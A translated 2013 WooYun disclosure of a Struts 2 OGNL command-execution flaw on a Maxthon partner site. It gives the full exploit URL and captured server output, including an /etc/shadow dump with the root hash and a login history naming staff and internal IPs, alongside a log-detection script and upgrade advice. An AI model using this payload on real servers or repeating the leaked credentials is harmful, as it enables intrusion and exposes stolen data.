
Vulnerability summary (24 watchers)

Defect ID: wooyun-2013-038313

Title: Command execution vulnerability in a third-party framework on a Maxthon subdomain

Vendor: Maxthon (傲游)

Author: 猪猪侠

Submitted: 2013-09-27 01:40

Fix time: 2013-11-11 01:40

Public disclosure: 2013-11-11 01:40

Type: command execution

Severity: high

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-09-27: Details sent to the vendor, awaiting vendor handling
2013-09-27: Vendor confirmed; details visible to the vendor only
2013-10-07: Details disclosed to core white hats and domain experts
2013-10-17: Details disclosed to regular white hats
2013-10-27: Details disclosed to intern white hats
2013-11-11: Details disclosed to the public

Brief description:

The site runs a third-party web framework (Apache Struts 2, identified below by the `.action` URL mapping, the `redirect:` parameter prefix and the `com.opensymphony.xwork2` context key in the payload) whose parameter-prefix handling evaluates attacker-supplied OGNL, giving unauthenticated remote command execution from a single crafted GET request.

Detailed description:

# Where the vulnerability is
http://partner.maxthon.com/rnd.action
# Command execution
The `redirect:` prefix is handled by the Struts 2 action mapper, which evaluates the OGNL inside `${...}`. The expression below (URL-encoded: `%23` is `#`, `%3d` is `=`, `%20` is a space) starts `/sbin/ifconfig -a` through `java.lang.ProcessBuilder`, reads up to 50000 characters of its stdout, and writes them into the HTTP response by fetching the `HttpServletResponse` object from the XWork context:
http://partner.maxthon.com/?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'/sbin/ifconfig','-a'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

Response body (output of `/sbin/ifconfig -a` on the server):

eth0 Link encap:Ethernet HWaddr 00:0C:29:07:A0:F1
inet addr:10.0.16.65 Bcast:10.0.23.255 Mask:255.255.248.0
inet6 addr: fe80::20c:29ff:fe07:a0f1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:12559116 errors:0 dropped:0 overruns:0 frame:0
TX packets:3899410 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1365674528 (1.2 GiB) TX bytes:1494013973 (1.3 GiB)
eth1 Link encap:Ethernet HWaddr 00:0C:29:07:A0:FB
inet6 addr: fe80::20c:29ff:fe07:a0fb/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2534520 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:184504274 (175.9 MiB) TX bytes:468 (468.0 b)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
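The request above leaves a distinctive trace in any web-server access log: a parameter *name* that starts with one of the Struts 2 action-mapper prefixes (`action:`, `redirect:`, `redirectAction:`, the set covered by Apache advisory S2-016) and carries an OGNL expression. The following is an added example, not code from the report or from Maxthon, showing how to sweep a log for that pattern and pull the executed command vector out of the payload. The log lines, client addresses and timestamps are constructed; only the second request line reuses the exact URL from the report. The combined-log-format layout is an assumption about the target's logging.

```python
"""Access-log detection for the Struts 2 'redirect:' / 'redirectAction:' / 'action:'
prefix OGNL injection (Apache advisory S2-016), the vector used in this report.

Added example, not code from the report. Log lines, IPs and timestamps below are
constructed; only the second request line reuses the payload from the report.
"""
import re
from urllib.parse import unquote

# Parameter-name prefixes interpreted by the Struts 2 DefaultActionMapper.
DANGEROUS_PREFIXES = ("redirectAction:", "redirect:", "action:")
# Markers of an OGNL expression, or of the usual exec / response-echo chain, in the value.
OGNL_MARKERS = ("${", "%{", "#context", "#_memberAccess", "ProcessBuilder",
                "getRuntime", "HttpServletResponse")

# Combined-log-format request lines (constructed sample data; line 2 is the report's URL).
SAMPLE_LOG = r"""
203.0.113.7 - - [27/Sep/2013:01:35:02 +0800] "GET /rnd.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Sep/2013:01:36:10 +0800] "GET /?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'/sbin/ifconfig','-a'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Sep/2013:01:36:40 +0800] "GET /?redirect:${7*7} HTTP/1.1" 302 0 "-" "curl/7.30.0"
198.51.100.2 - - [27/Sep/2013:01:37:00 +0800] "GET /login.action?redirect=/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# argv vector of a "new java.lang.ProcessBuilder(new java.lang.String[]{...})" call.
PB_RE = re.compile(r"ProcessBuilder\(\s*new\s+java\.lang\.String\[\]\s*\{([^}]*)\}")


def parse_line(line):
    """Parse one access-log line; query parameters are returned URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    params = []
    for part in query.split("&"):
        if part:
            # Struts evaluates the *name* side of the pair, so decode both halves.
            name, _, value = part.partition("=")
            params.append((unquote(name), unquote(value)))
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
            "status": int(m.group("status")), "params": params}


def extract_argv(expr):
    """Pull the command vector out of a ProcessBuilder(new String[]{...}) call."""
    m = PB_RE.search(expr)
    if not m:
        return []
    return [a or b for a, b in re.findall(r"'([^']*)'|\"([^\"]*)\"", m.group(1))]


def classify_request(parsed):
    """Return a finding for the first prefixed parameter name, or None."""
    for name, _value in parsed["params"]:
        prefix = next((p for p in DANGEROUS_PREFIXES if name.startswith(p)), None)
        if prefix is None:
            continue
        expr = name[len(prefix):]
        ognl = any(marker in expr for marker in OGNL_MARKERS)
        return {
            "ip": parsed["ip"], "ts": parsed["ts"], "path": parsed["path"],
            "status": parsed["status"], "prefix": prefix,
            # A prefixed name without an expression is still worth logging: the
            # mapper accepts it as a navigation override from the client.
            "severity": "ognl-injection" if ognl else "prefix-only",
            "argv": extract_argv(expr),
            "expr": expr[:80],
        }
    return None


def scan(log_text):
    """Run the check over every line; returns the findings in log order."""
    findings = []
    for line in log_text.strip().splitlines():
        parsed = parse_line(line)
        if parsed is not None:
            finding = classify_request(parsed)
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['severity']} prefix={f['prefix']} argv={f['argv']}")
```

Note that the benign-looking `redirect=/home` on the last line is not flagged: the mapper only reacts to a colon-terminated prefix in the parameter name, so matching on `redirect` alone would drown the signal in normal traffic. The `${7*7}` line is the harmless arithmetic probe an attacker typically sends first; treat it as the same finding class as a full exec chain, since it proves expression evaluation.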

Proof of vulnerability:

Contents of /etc/shadow returned through the same injection; the readable root hash shows the application server runs as root:

root:$6$fXnmUKPubngrkiuy$30XJ7I5MTqezhasTTC13uwALySkGqVfJZi7.wRj/rb6l9t8v58Ew/zoiOMUCg4mLNBS9rTxWNazEHaKqs1qbb0:15889:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
operator:*:15513:0:99999:7:::
games:*:15513:0:99999:7:::
gopher:*:15513:0:99999:7:::
ftp:*:15513:0:99999:7:::
nobody:*:15513:0:99999:7:::
dbus:!!:15889::::::
vcsa:!!:15889::::::
abrt:!!:15889::::::
haldaemon:!!:15889::::::
ntp:!!:15889::::::
saslauth:!!:15889::::::
postfix:!!:15889::::::
sshd:!!:15889::::::
tcpdump:!!:15889::::::
zouyi:!!:15889:0:99999:7:::
songqi:!!:15889:0:99999:7:::
zoufei:!!:15889:0:99999:7:::
yaoxinnan:!!:15889:0:99999:7:::
zengxiaowei:!!:15889:0:99999:7:::
guoluoyao:!!:15889:0:99999:7:::
likailiang:!!:15889:0:99999:7:::
yueqi:!!:15951:0:99999:7:::
yuchunlin:!!:15951:0:99999:7:::

Output of `last` (login history from the host's wtmp):
yuchunli pts/2        10.0.16.50       Tue Sep 17 15:57 - 21:12  (05:15)    
yuchunli pts/0 10.0.16.50 Tue Sep 17 15:10 - 17:54 (02:44)
yuchunli pts/0 10.0.16.50 Mon Sep 16 14:58 - 21:16 (06:18)
root pts/2 10.0.8.249 Wed Sep 11 18:38 - 18:45 (00:06)
yuchunli pts/0 10.0.16.50 Wed Sep 11 18:30 - 21:24 (02:54)
root pts/3 10.0.8.249 Wed Sep 11 09:42 - 09:48 (00:05)
root pts/3 10.0.8.249 Wed Sep 11 09:40 - 09:42 (00:01)
root pts/3 10.0.8.249 Wed Sep 11 09:36 - 09:38 (00:01)
root pts/3 10.0.8.249 Wed Sep 11 09:35 - 09:36 (00:00)
root pts/3 10.0.8.249 Wed Sep 11 09:35 - 09:35 (00:00)
root pts/3 10.0.8.249 Wed Sep 11 09:33 - 09:33 (00:00)
root pts/2 10.0.8.249 Wed Sep 11 09:29 - 11:42 (02:13)
yuchunli pts/0 10.0.16.50 Wed Sep 11 09:18 - 14:21 (05:02)
yuchunli pts/2 10.0.16.50 Tue Sep 10 16:19 - 16:22 (00:02)
yuchunli pts/0 10.0.16.50 Fri Sep 6 09:35 - 13:46 (04:10)
yuchunli pts/2 10.0.16.50 Wed Sep 4 09:43 - 13:17 (03:34)
yueqi pts/3 192.168.0.66 Tue Sep 3 10:30 - 10:31 (00:01)
yuchunli pts/2 10.0.16.50 Tue Sep 3 10:29 - 14:12 (03:43)
yuchunli pts/3 10.0.16.50 Tue Sep 3 10:25 - 10:26 (00:00)
root pts/2 192.168.0.66 Tue Sep 3 10:25 - 10:26 (00:00)
root pts/2 192.168.0.66 Tue Sep 3 10:23 - 10:24 (00:01)
likailia pts/0 10.0.16.50 Fri Aug 30 18:35 - 18:40 (00:05)
likailia pts/2 10.0.16.50 Fri Aug 30 17:03 - 18:03 (00:59)
likailia pts/0 10.0.16.50 Thu Aug 29 14:48 - 18:36 (03:47)
likailia pts/2 10.0.16.50 Wed Aug 28 17:17 - 17:59 (00:42)
likailia pts/0 10.0.16.50 Tue Aug 27 18:22 - 18:27 (00:05)
root pts/0 10.0.8.249 Tue Aug 27 10:43 - 10:44 (00:01)
likailia pts/2 10.0.16.50 Tue Aug 27 09:46 - 15:32 (05:46)
likailia pts/0 10.0.16.50 Mon Aug 26 17:39 - 18:18 (00:39)
likailia pts/0 10.0.16.50 Mon Aug 26 14:24 - 14:24 (00:00)
root pts/0 10.0.8.249 Fri Aug 23 18:49 - 18:49 (00:00)
root pts/0 10.0.8.249 Fri Aug 23 18:46 - 18:49 (00:02)
root pts/1 10.0.8.249 Fri Aug 23 18:28 - 18:29 (00:00)
root pts/1 10.0.8.249 Fri Aug 23 18:25 - 18:25 (00:00)
likailia pts/0 10.0.16.50 Fri Aug 23 18:13 - 18:33 (00:20)
root pts/1 10.0.8.249 Fri Aug 23 14:12 - 16:23 (02:11)
likailia pts/0 10.0.16.50 Fri Aug 23 09:47 - 16:09 (06:22)
likailia pts/0 10.0.16.50 Thu Aug 22 09:28 - 09:29 (00:00)
likailia pts/0 10.0.16.50 Wed Aug 21 09:24 - 18:22 (08:57)
likailia pts/0 10.0.16.50 Thu Jul 25 16:35 - 18:27 (01:52)
root pts/0 10.0.8.249 Thu Jul 25 16:15 - 16:22 (00:06)
root pts/0 192.168.0.66 Wed Jul 17 14:19 - 14:19 (00:00)
likailia pts/0 10.0.16.50 Mon Jul 15 15:11 - 17:22 (02:11)
root pts/0 10.0.8.249 Wed Jul 3 15:31 - 15:31 (00:00)
root pts/0 192.168.0.66 Wed Jul 3 14:53 - 14:54 (00:01)
likailia pts/0 192.168.0.66 Wed Jul 3 14:47 - 14:47 (00:00)
root pts/0 192.168.0.66 Wed Jul 3 14:46 - 14:46 (00:00)
root pts/0 192.168.0.66 Wed Jul 3 14:36 - 14:39 (00:02)
root tty1 Wed Jul 3 14:15 still logged in
reboot system boot 2.6.32-279.el6.x Wed Jul 3 19:45 - 01:39 (85+05:54)
root tty1 Wed Jul 3 19:43 - down (00:01)
reboot system boot 2.6.32-279.el6.x Wed Jul 3 19:36 - 19:44 (00:08)
wtmp begins Wed Jul 3 19:36:32 2013

Fix recommendation:

# Update the third-party framework. The `redirect:` prefix and the `com.opensymphony.xwork2` context key identify it as Apache Struts 2; OGNL evaluation of the `action:`, `redirect:` and `redirectAction:` parameter prefixes is the issue covered by Apache advisory S2-016 and fixed in Struts 2.3.15.1, so upgrade to that release or later. As a stopgap until the upgrade, reject requests whose parameter names begin with any of those three prefixes at the front end. Because the shell ran as root and /etc/shadow was exposed, also rotate the root password and review the accounts listed above.

Copyright: please credit 猪猪侠@乌云 when reposting.


Vendor response

Vendor reply:

Severity: medium

Rank: 10

Confirmed: 2013-09-27 13:30

Vendor comment:

Thanks for the report.

Latest status:

2013-09-27: Fixed